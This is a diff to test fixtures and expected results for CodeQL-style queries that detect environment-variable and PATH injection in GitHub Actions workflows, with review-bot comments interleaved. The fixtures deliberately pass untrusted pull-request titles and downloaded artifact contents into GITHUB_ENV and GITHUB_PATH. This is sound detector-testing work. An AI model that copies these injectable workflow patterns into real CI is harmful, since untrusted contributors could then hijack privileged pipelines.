-Dsonar.organization=opencost diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml index 3cab86f3171b..c3c94755efd6 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml @@ -1,27 +1,13 @@ -name: Pull Request Open +name: Test on: pull_request_target: - branches: - - main - - 14.0.x - - types: - - opened - - reopened jobs: - updateJira: - if: github.actor != 'dependabot[bot]' + test: runs-on: ubuntu-latest steps: - - name: Checkout repository - uses: actions/checkout@v4 - - - name: Extract Jira Key + - name: Code Injection, do not report as ENV VAR INJ run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV - - name: Sink - run: echo ${{ env.ISSUE_KEY }} - diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml index e71178c4ad66..c902b7e61bd2 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml @@ -1,6 +1,4 @@ -# https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0 -# https://github.com/firebase/friendlyeats-web/commit/df65aefd24cf6f092a27a5576067ff9f29aa2ef1 -name: Deploy Preview +name: Test on: workflow_run: workflows: ["Generate Preview"] @@ -8,11 +6,8 @@ on: - completed jobs: - deploy: + test: runs-on: ubuntu-latest - if: > - ${{ github.event.workflow_run.event == 'pull_request' && - github.event.workflow_run.conclusion == 'success' }} steps: - name: 'Download artifact' uses: actions/github-script@v3.1.0 
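Review bot: The first hunk of test2.yml drops the two comment lines pointing at the Legit Security write-up and the firebase/friendlyeats-web fix commit, so the fixture no longer records which real-world `workflow_run` environment-injection pattern it reproduces. That provenance is what lets a maintainer judge whether a later change to the query or to the fixture still covers the original case, and it costs nothing to keep under the new generic name. I'd restore them as a leading comment, e.g. `# Based on https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0` and `# and https://github.com/firebase/friendlyeats-web/commit/df65aefd24cf6f092a27a5576067ff9f29aa2ef1`. The following hunk also removes the job-level `if:` on `workflow_run.event`/`conclusion`; that is fine for a minimal fixture, but a one-line comment saying the guard was dropped deliberately would stop someone "fixing" it back in.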
@@ -43,31 +38,6 @@ jobs: }); var fs = require('fs'); fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(downloadPr.data)); - fs.writeFileSync('${{github.workspace}}/firestore-web.zip', Buffer.from(downloadPreview.data)); - run: | unzip pr.zip echo "pr_number=$(cat NR)" >> $GITHUB_ENV - mkdir firestore-web - unzip firestore-web.zip -d firestore-web - - name: Deploy preview - id: deploy_preview - uses: FirebaseExtended/action-hosting-deploy@v0 - with: - repoToken: '${{ secrets.GITHUB_TOKEN }}' - firebaseServiceAccount: '${{ secrets.FIREBASE_SERVICE_ACCOUNT_FIR_CODELABS_89252 }}' - projectId: fir-codelabs-89252 - entryPoint: firestore-web - channelId: firestore-web-${{ env.pr_number }} - env: - FIREBASE_CLI_PREVIEWS: hostingchannels - - name: Write Comment - uses: actions/github-script@v3 - with: - github-token: ${{ secrets.GITHUB_TOKEN }} - script: | - await github.issues.createComment({ - owner: context.repo.owner, - repo: context.repo.repo, - issue_number: ${{ env.pr_number }}, - body: 'View preview ${{ steps.deploy_preview.outputs.details_url }}' - }); diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml index 2f76d4a3042a..f76454c6088f 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml @@ -1,17 +1,13 @@ -# https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project -# https://github.com/google/orbit/commit/6cd71a3f1eec098d0de61bf9bb742737cb3aa5fa -name: report-checks +name: Test on: workflow_run: workflows: ['checks'] types: - completed -permissions: read-all + jobs: - report-clang-tidy-diff: - permissions: - pull-requests: write + test: runs-on: ubuntu-latest steps: - name: Download PR metadata 
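Review bot: Removing `permissions: read-all` at the workflow level and `pull-requests: write` on the job means test3.yml no longer exercises whether the privileged query variant takes explicit permission scoping into account; PrivilegedEnvVarInjection.expected still lists test3.yml, so the fixture now only covers the default-token case. If the privileged queries are meant to reason about `permissions:`, keep one fixture with an explicit block (the original had both the workflow-level `read-all` and a job-level write grant, which is the interesting combination). If they are not, a short comment saying permissions are intentionally unspecified would stop the next reader from re-adding them.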
@@ -21,44 +17,7 @@ jobs: workflow_conclusion: '' name: pr_metadata if_no_artifact_found: 'ignore' - - name: Download clang_tidy_fixes - uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 - with: - workflow: ${{ github.event.workflow_run.workflow_id }} - workflow_conclusion: '' - name: clang_tidy_fixes - if_no_artifact_found: 'ignore' - - name: Set found_files - id: set_found_files - run: | - if [ -f clang-tidy-fixes.yml ] && [ -f pr_number.txt ] && [ -f pr_head_repo.txt ] && [ -f pr_head_ref.txt ]; then - echo "found_files=true" >> $GITHUB_OUTPUT - else - echo "found_files=false" >> $GITHUB_OUTPUT - fi - run: | echo "PR_NUMBER=$(cat pr_number.txt | jq -r .)" >> $GITHUB_ENV echo "PR_HEAD_REPO=$(cat pr_head_repo.txt | jq -Rr .)" >> $GITHUB_ENV echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV - if: steps.set_found_files.outputs.found_files == 'true' - - uses: actions/checkout@v3 - if: steps.set_found_files.outputs.found_files == 'true' - with: - repository: ${{ env.PR_HEAD_REPO }} - ref: ${{ env.PR_HEAD_REF }} - persist-credentials: false - - name: Redownload clang_tidy_fixes - if: steps.set_found_files.outputs.found_files == 'true' - uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 - with: - workflow: ${{ github.event.workflow_run.workflow_id }} - workflow_conclusion: '' - name: clang_tidy_fixes - if_no_artifact_found: 'ignore' - - uses: platisd/clang-tidy-pr-comments@89ea1b828cdac1a6ec993d225972adea3b8841b6 - if: steps.set_found_files.outputs.found_files == 'true' - with: - github_token: ${{ secrets.ORBITPROFILER_BOT_PAT }} - clang_tidy_fixes: clang-tidy-fixes.yml - pull_request_id: ${{ env.PR_NUMBER }} - diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index 1e4542b63189..733b15fc9564 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml 
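Review bot: With the `Set found_files` step and its `if: steps.set_found_files.outputs.found_files == 'true'` guard gone, the remaining run step reads `pr_number.txt`, `pr_head_repo.txt` and `pr_head_ref.txt` unconditionally even though the download step above keeps `if_no_artifact_found: 'ignore'`; harmless for a fixture, but worth stating, e.g. `# Files come from the pr_metadata artifact of the triggering (untrusted) run; no existence guard on purpose`. The same comment could note that `jq -r .` parses pr_number.txt as JSON while the other two lines use `jq -Rr .` (raw input), so only the repo and ref values reach GITHUB_ENV unparsed — presumably kept from the original workflow deliberately, since the expected result spans all three echo lines.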
+++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -1,23 +1,20 @@ -name: Pull Request Open +name: Test on: pull_request_target: - branches: - - main - - 14.0.x - - types: - - opened - - reopened jobs: - updateJira: - if: github.actor != 'dependabot[bot]' + test: runs-on: ubuntu-latest steps: - - name: Checkout repository - uses: actions/checkout@v4 - + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo "PR_TITLE=$TITLE" >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV - env: TITLE: ${{ github.event.pull_request.title }} run: | @@ -42,9 +39,11 @@ jobs: echo "$TITLE" >> "$GITHUB_ENV" echo EOF } >> "$GITHUB_ENV" - - run: | + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | cat <<-"EOF" >> "$GITHUB_ENV" - echo "$TITLE" + echo "FOO=$TITLE" EOF diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml new file mode 100644 index 000000000000..cfc5e6ef1fa5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml 
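Review bot: The new last step feeds `TITLE` into a here-doc whose delimiter is quoted (`cat <<-"EOF" >> "$GITHUB_ENV"`), so `$TITLE` is written literally and never expanded, and accordingly no test4.yml result for those lines appears in the updated `.expected` files. Nothing in the fixture says this is the intended negative, so a reader could take the added `env: TITLE:` block as a positive case that the query missed; suggest `# Quoted delimiter: $TITLE is NOT expanded, so the tainted value never reaches GITHUB_ENV — must not be reported`. If a positive here-doc case was intended instead, the delimiter would need to be unquoted (`<<-EOF`); `<<-` only strips leading tabs, which is irrelevant here since the body is space-indented.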
@@ -0,0 +1,36 @@ +name: Test +on: + workflow_run: + workflows: ["Build/Test"] + types: [completed] +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: 'Download code coverage' + uses: actions/github-script@v7 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "oc-code-coverage" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); + - name: 'Unzip code coverage' + run: unzip oc-code-coverage.zip -d coverage + - name: set env vars + run: | + echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV + echo "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV + echo "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected index 6d9801ccd819..d3b90de71e32 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected 
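Review bot: test5.yml has no comment saying what it is expected to find, unlike the step name in test1.yml: the source is the artifact downloaded via `context.payload.workflow_run.id` in the `github-script` step and the sink is the three `echo "...=$(cat coverage/...)" >> $GITHUB_ENV` lines, which is what the new test5.yml rows in EnvVarInjection.expected and PrivilegedEnvVarInjection.expected reflect. Suggest a header comment such as `# Artifact written by the (untrusted) triggering workflow_run flows into GITHUB_ENV; expect EnvVarInjection on the 'set env vars' step`. Minor: `allArtifacts.data.artifacts.filter(...)[0]` is `undefined` when no artifact named `oc-code-coverage` exists, so `matchArtifact.id` would throw — fine for a fixture, but a `// assumes the artifact exists` note would stop the file being copied as a template.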
@@ -1,10 +1,20 @@ edges -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:9:26:6 | Run Step | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:26:9:29:41 | Run Step | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | nodes -| .github/workflows/path1.yml:11:21:11:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | semmle.label | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | 
semmle.label | echo ${PATHINJ} >> $GITHUB_PATH | | .github/workflows/path1.yml:21:9:25:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/path1.yml:25:9:26:6 | Run Step | semmle.label | Run Step | -| .github/workflows/path1.yml:26:9:29:41 | Run Step | semmle.label | Run Step | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | semmle.label | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 0c4574a77cbb..56345ca896a8 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected 
@@ -1,16 +1,31 @@ edges -| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | -| .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | -| .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | -| .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 
'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes -| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test2.yml:17:9:47:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test2.yml:47:9:52:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| 
.github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | semmle.label | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> 
$GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected new file mode 100644 index 000000000000..2dfa8702d591 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected 
@@ -0,0 +1,26 @@ +edges +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +nodes +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | semmle.label | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | semmle.label | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | semmle.label | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | 
semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | +subpaths +#select +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref new file mode 100644 index 000000000000..ba2d522c03d2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref @@ -0,0 +1 @@ +Security/CWE-077/PrivilegedEnvPathInjection.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 6dbe7bf3c936..f88785c38e1a 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected 
@@ -1,21 +1,40 @@ edges -| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | -| .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | -| .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | -| .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 
